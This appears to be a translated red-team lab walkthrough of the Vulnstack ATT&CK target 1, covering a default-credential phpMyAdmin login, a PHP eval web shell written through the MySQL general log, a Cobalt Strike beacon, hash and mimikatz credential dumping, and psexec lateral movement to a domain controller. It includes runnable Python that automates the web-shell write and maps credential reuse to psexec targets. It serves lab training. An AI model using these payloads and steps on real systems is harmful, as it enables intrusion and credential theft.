
ATT&CK Red Team Assessment Practical Target - 1

Introduction

The target environment comes from: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

A simple lab environment that was originally meant for a student assessment but never got used. Lateral movement inside the domain uses only Cobalt Strike's psexec module; the main goal is to become familiar with the overall penetration workflow.

Several of the lab's vulnerabilities could not be reproduced because of environment problems, but the overall process works.

Environment Setup

Disable accelerated 3D graphics in each VM's display settings; otherwise the virtual machines will not start.

image

The topology is as follows:

image

The network settings are as follows, using VMnet2 (host-only, the 192.168.52.0/24 internal network) and VMnet8 (NAT, 192.168.111.0/24):

image

Web server (VM1) - Win7 (two network adapters: NAT mode + VMnet2 (host-only))

image

IP: 192.168.111.128 (NAT, reachable from the attacker) and 192.168.52.143 (VMnet2, internal network)

Start phpStudy

image

DNS points to the DC (192.168.52.138)

image

Win2008 DC (VM3)

IP: 192.168.52.138

image

Win2003 domain member (VM2)

IP: 192.168.52.141

image

View the current domain

image

Penetration Process

Information Gathering

Nmap Port Scanning

image

image

Sword Scanning

image

Directory Scanning

image

phpinfo page

image

phpMyAdmin Login

The login uses the default credentials root/root.

image

phpMyAdmin Getshell

Get a shell through the MySQL general query log. Changing global variables requires the SUPER privilege, which root has, and secure_file_priv (the setting that blocks INTO OUTFILE) does not apply to the general log file, so this route works even when writing files directly from a query does not.

Check whether logging is enabled and where the log is stored: SHOW VARIABLES LIKE "general_log%";
image

Enable logging: set global general_log='on';
Check that it is enabled: SHOW VARIABLES LIKE "general_log%";

image

Point the log file into the web root. First find the website directory (the phpinfo page shows it as DOCUMENT_ROOT):

image

Set the log path: set global general_log_file ='C:\\phpStudy\\WWW\\s.php'; (the backslashes are doubled because a backslash is an escape character inside a MySQL string literal)

Successfully set

image

With that set up, write the shell. A single query is enough, because the server writes the full text of every statement it receives into the log file, PHP tag included:

select "<?php @eval($_POST[cmd]);?>";

image

Access the web shell (the file name must match the path set in general_log_file):
http://192.168.111.128/ss.php
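The sequence above as an added, runnable example (not code from the original post): it builds the three statements with correct MySQL escaping of the Windows path, sends them through a DB-API cursor, verifies that the log file really moved, and restores the original settings afterwards. RecordingCursor is a constructed stand-in that imitates only the server behaviour involved (each statement is appended to the current log before it takes effect), so the script runs offline; a real pymysql cursor has the same execute/fetchall interface and can be passed instead to run it against the lab. The default log path in ORIGINAL_LOG and the web root are assumptions for the example.

```python
import re

# Added example, not from the original post. Models the general_log getshell:
# turn the query log on, point it into the web root, run a query whose text
# carries the PHP. RecordingCursor is a constructed stand-in for a DB-API
# cursor; pass a real pymysql cursor to run this against a server.

PAYLOAD = "<?php @eval($_POST[cmd]);?>"               # the page's one-liner shell
ORIGINAL_LOG = "C:\\phpStudy\\MySQL\\data\\host.log"  # assumed default log path


def mysql_literal(value):
    # Backslashes and quotes are escape characters inside a MySQL string
    # literal, so a Windows path must be written with doubled backslashes
    # (as the page does: 'C:\\phpStudy\\WWW\\s.php'); a single backslash
    # would be consumed and the log would land somewhere else.
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def mysql_unquoted(raw):
    # Inverse of the escaping above; used only by the stand-in server.
    return re.sub(r"\\(.)", r"\1", raw)


def getshell_statements(path, payload=PAYLOAD):
    """The page's three statements, in the order they must be sent."""
    return [
        "SET GLOBAL general_log = 'ON'",
        "SET GLOBAL general_log_file = " + mysql_literal(path),
        "SELECT " + mysql_literal(payload),
    ]


class RecordingCursor:
    """Constructed stand-in: tracks the two general_log variables and the
    files the server would write. MySQL appends each statement to the log as
    it is received, before executing it, so the statement that changes the
    path still lands in the old file; that ordering is reproduced here."""

    def __init__(self, general_log="OFF", general_log_file=ORIGINAL_LOG):
        self.variables = {"general_log": general_log,
                          "general_log_file": general_log_file}
        self.files = {}      # log path -> text written so far
        self.executed = []   # every statement sent, in order
        self._rows = []

    def execute(self, sql):
        self.executed.append(sql)
        self._rows = []
        if self.variables["general_log"] == "ON":
            path = self.variables["general_log_file"]
            self.files[path] = self.files.get(path, "") + sql + "\n"
        m = re.fullmatch(r"SET GLOBAL (\w+)\s*=\s*'(.*)'", sql, re.I | re.S)
        if m:
            self.variables[m.group(1).lower()] = mysql_unquoted(m.group(2))
            return
        m = re.fullmatch(r"SHOW VARIABLES LIKE '(\w+)%'", sql, re.I)
        if m:
            prefix = m.group(1).lower()
            self._rows = [(k, v) for k, v in self.variables.items()
                          if k.startswith(prefix)]

    def fetchall(self):
        return list(self._rows)


def show_general_log(cursor):
    cursor.execute("SHOW VARIABLES LIKE 'general_log%'")
    return dict(cursor.fetchall())


def getshell(cursor, webroot, filename, payload=PAYLOAD):
    """Run the sequence and verify the log really moved. Returns the original
    settings (for restore) and the path of the written shell."""
    before = show_general_log(cursor)
    path = webroot.rstrip("\\/") + "\\" + filename
    for stmt in getshell_statements(path, payload):
        cursor.execute(stmt)
    after = show_general_log(cursor)
    if after.get("general_log_file") != path:
        # SET GLOBAL needs SUPER: root has it, a restricted account does not
        raise RuntimeError("general_log_file did not change; missing SUPER?")
    return before, path


def restore(cursor, before):
    """Put the log settings back; the shell file itself stays on disk."""
    cursor.execute("SET GLOBAL general_log_file = "
                   + mysql_literal(before["general_log_file"]))
    cursor.execute("SET GLOBAL general_log = "
                   + mysql_literal(before["general_log"]))


if __name__ == "__main__":
    cur = RecordingCursor()
    original, shell = getshell(cur, "C:\\phpStudy\\WWW", "s.php")
    restore(cur, original)
    print("shell written to", shell)
    print(cur.files[shell])
```

Running the dry run shows why the order matters: the statement that changes general_log_file is itself logged into the old file, and only the SELECT that follows lands in s.php. The restore step is the part the page leaves out; without it the query log keeps growing inside the web root, which is both noisy and an obvious artifact for the defender.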

image

Connect with AntSword:

image

The site on port 80 is yxcms.

image

Logging in to the yxcms backend also allows executing SQL statements.

image

Check the IP address from the web shell (ipconfig):

image

The host has two network adapters, so there is an internal network behind it.

Cobalt Strike Startup

Bring the host online in Cobalt Strike.

Server

image

Client

Create a listener

image

image

Generate payload

image

Upload the payload through AntSword and execute it

image

Run the exe; the beacon checks in to Cobalt Strike.

image

sleep 0 (no delay between check-ins, convenient for interactive work in the lab; in a real engagement keep a sleep with jitter to limit beaconing noise)

image

shell whoami

image

Privilege Escalation

Run getsystem in the beacon to obtain SYSTEM privileges. It relies on named-pipe impersonation and only works when the beacon already has local administrator rights, so check the whoami output first.

image

Internal Network Information Collection

image

Open the Targets view: three hosts show up. If nothing appears, run a port scan of the internal subnet (portscan 192.168.52.0/24) and the hosts will be added.

image

Dump the password hashes (hashdump)

image

Obtain plaintext passwords (logonpasswords, which runs mimikatz)

image

Lateral Movement

With a password in hand, use psexec for lateral movement. It copies a service binary to the target's ADMIN$ share over SMB (port 445) and starts it as a service, which also leaves a service-installation event (ID 7045) in the target's System log. Here the three machines share the same password. If they did not, psexec with that credential would simply fail on the other hosts; you would need a credential the target accepts, for example a domain account recovered from memory, or pass-the-hash (Cobalt Strike's pth command) with a hash that is valid there.
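To make the "same password on all three machines" condition something you check rather than assume, here is an added example (not from the original post) that reads hashdump-format output from the hosts you already control and reports which accounts share an NT hash across machines, which of those are the built-in Administrator (RID 500, so psexec will work with that password or its hash), and which accounts have blank passwords. The dumps are constructed sample data: the addresses are the lab's, but the hash values and the reuse pattern are invented, and one host is given a different Administrator password so the failing case shows up; EMPTY_LM and EMPTY_NT are the real well-known hashes of a blank password.

```python
# Added example, not from the original post. Hashdump lines have the form
# user:rid:lmhash:nthash:::. An NT hash that appears on two hosts means the
# same password on both, which is exactly the condition psexec relies on.

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of a blank password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of a blank password

# Constructed sample dumps: the lab's addresses, invented hashes. The .141 host
# deliberately has a different Administrator password.
SAMPLE_DUMPS = {
    "192.168.52.143": """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backup:1001:aad3b435b51404eeaad3b435b51404ee:5c7f4d3e2b1a0f9e8d7c6b5a4f3e2d1c:::
""",
    "192.168.52.138": """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
""",
    "192.168.52.141": """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b2ac2d1c7c8fda6cea80b5fad7563aa:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backup:1001:aad3b435b51404eeaad3b435b51404ee:5c7f4d3e2b1a0f9e8d7c6b5a4f3e2d1c:::
""",
}


def parse_hashdump(text):
    """Parse user:rid:lm:nt::: lines; blank lines and stray spaces are ignored."""
    creds = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            raise ValueError("not a hashdump line: " + line)
        creds.append({"user": parts[0], "rid": int(parts[1]),
                      "lm": parts[2].lower(), "nt": parts[3].lower()})
    return creds


def reuse_map(dumps):
    """NT hash -> sorted (host, user) pairs sharing it, for hashes present on
    more than one host: the credential-reuse picture across the estate."""
    seen = {}
    for host, text in dumps.items():
        for c in parse_hashdump(text):
            seen.setdefault(c["nt"], set()).add((host, c["user"]))
    return {nt: sorted(pairs) for nt, pairs in seen.items()
            if len({h for h, _ in pairs}) > 1}


def blank_passwords(dumps):
    """Accounts whose NT hash is that of the empty string."""
    return sorted((host, c["user"]) for host, text in dumps.items()
                  for c in parse_hashdump(text) if c["nt"] == EMPTY_NT)


def psexec_targets(source, dumps):
    """For each credential dumped on `source`, the other hosts where the same
    NT hash sits on the built-in Administrator (RID 500), where psexec with
    that password or pass-the-hash will work. Matches on other accounts are
    returned separately: same password, but admin rights unknown."""
    by_hash = {}
    for host, text in dumps.items():
        if host == source:
            continue
        for c in parse_hashdump(text):
            by_hash.setdefault(c["nt"], []).append((host, c["user"], c["rid"]))
    admin, maybe = {}, {}
    for c in parse_hashdump(dumps[source]):
        if c["nt"] == EMPTY_NT:      # Guest-style blanks are reported elsewhere
            continue
        for host, user, rid in by_hash.get(c["nt"], []):
            bucket = admin if rid == 500 else maybe
            bucket.setdefault(c["user"], []).append(host)
    return admin, maybe


if __name__ == "__main__":
    for nt, pairs in reuse_map(SAMPLE_DUMPS).items():
        print("reused", nt, pairs)
    print("blank passwords:", blank_passwords(SAMPLE_DUMPS))
    admin, maybe = psexec_targets("192.168.52.143", SAMPLE_DUMPS)
    print("psexec will work:", admin)
    print("same password, rights unknown:", maybe)
```

On the sample data the Administrator hash from .143 matches the DC, so psexec from the web server to .138 works, while .141 only shares the non-privileged backup account's password and would need a different credential. In the real lab the dumps come from hashdump on each beacon; a dump from a domain-joined host covers only the local SAM, so a domain account seen in logonpasswords output is tested separately.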

image

Select psexec64 for the 64-bit target

image

image

The domain controller is taken over.

image

image

image

Use the same method to take control of .141, the Win2003 domain member.

image

Here you need to select psexec (32-bit), because this Win2003 host is 32-bit.

image

Check the IP

image
